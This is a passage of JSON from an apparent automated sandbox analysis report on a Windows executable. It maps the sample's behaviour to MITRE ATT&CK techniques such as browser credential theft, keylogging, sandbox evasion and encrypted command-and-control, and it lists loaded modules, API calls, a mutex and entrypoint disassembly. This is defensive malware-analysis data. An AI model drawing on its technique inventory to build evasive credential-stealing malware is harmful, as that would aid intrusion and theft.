"technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74DF0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\UUU-IONNKI\"\n \"UUU-IONNKI\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x1c,xor\teax, eax,mov\tdword ptr [ebp - 0x14], eax,mov\tdword ptr [ebp - 0x18], eax,mov\tdword ptr [ebp - 0x1c], eax,mov\teax, 0x5eed3c,call\t0x412648,xor\teax, eax,push\tebp,push\t0x5f9228,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,call\t0x407714,test\teax, eax,jle\t0x5f91b5,lea\tedx, [ebp - 0x14],mov\teax, 3,call\t0x407778,mov\teax, dword ptr [ebp - 0x14],push\teax,lea\tedx, [ebp - 0x18],mov\teax, 2,call\t0x407778,mov\teax, dword ptr [ebp - 0x18],push\teax,lea\tedx, [ebp - 0x1c],mov\teax, 1,call\t0x407778,mov\teax, dword ptr [ebp - 0x1c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70970000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"KERNEL32\" at base 77540000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"NTDLL.DLL\" at base 773d0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"NTDLL\" at base 773d0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"USER32.DLL\" at base 75d50000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"ADVAPI32.DLL\" at base 75610000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SHELL32.DLL\" at base 76560000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"DXGI.DLL\" at base 71410000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"RPCRT4.DLL\" at base 75960000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"MSVCRT.DLL\" at base 756c0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SHLWAPI.DLL\" at base 75a90000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"BCRYPT.DLL\" at base 74df0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"KERNEL32.DLL\" at base 77540000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"WININET.DLL\" at base 75e20000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"GDI32.DLL\" at base 75b80000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"OLE32.DLL\" at base 75bd0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"WINMM.DLL\" at base 6f740000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"WS2_32.DLL\" at base 75af0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"URLMON.DLL\" at base 76410000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"GDIPLUS.DLL\" at base 73be0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"PSAPI\" at base 75950000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SHCORE\" at base 0\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"USER32\" at base 75d50000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SHELL32\" at base 76560000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SHLWAPI\" at base 75a90000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"IPHLPAPI\" at base 73630000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"SSPICLI.DLL\" at base 75160000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75af0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74ca0000\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74800000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter NTDLL (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter dxgi.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter rpcrt4.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter msvcrt.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter Psapi (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter shcore (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" failed to load missing module \"shcore\" - [base:0; Status:c0000135]\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e7b6b@ADVAPI32.dll\"\n \"0e000f00703f7b6b@ADVAPI32.dll\"\n \"0e000f00cc3f7b6b@ADVAPI32.dll\"\n \"11001200b4477b6b@ADVAPI32.dll\"\n \"1100120048487b6b@ADVAPI32.dll\"\n \"120013008c487b6b@ADVAPI32.dll\"\n \"12001300e4487b6b@ADVAPI32.dll\"\n \"14001500386e7b6b@ADVAPI32.dll\"\n \"14001500506e7b6b@ADVAPI32.dll\"\n \"14001500686e7b6b@ADVAPI32.dll\"\n \"17001800806e7b6b@ADVAPI32.dll\"\n \"0d000e00986e7b6b@ADVAPI32.dll\"\n \"11001200a86e7b6b@ADVAPI32.dll\"\n \"11001200bc6e7b6b@ADVAPI32.dll\"\n \"0d000e0044667b6b@WININET.dll\"\n \"0d000e00b4667b6b@WININET.dll\"\n \"10001100ec667b6b@WININET.dll\"\n \"1000110090677b6b@WININET.dll\"\n \"10001100006f7b6b@WININET.dll\"\n \"10001100146f7b6b@WININET.dll\"\n \"14001500286f7b6b@WININET.dll\"\n \"14001500406f7b6b@WININET.dll\"\n \"12001300586f7b6b@WININET.dll\"\n \"120013006c6f7b6b@WININET.dll\"\n \"10001100d0677b6b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75960000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004928)\n 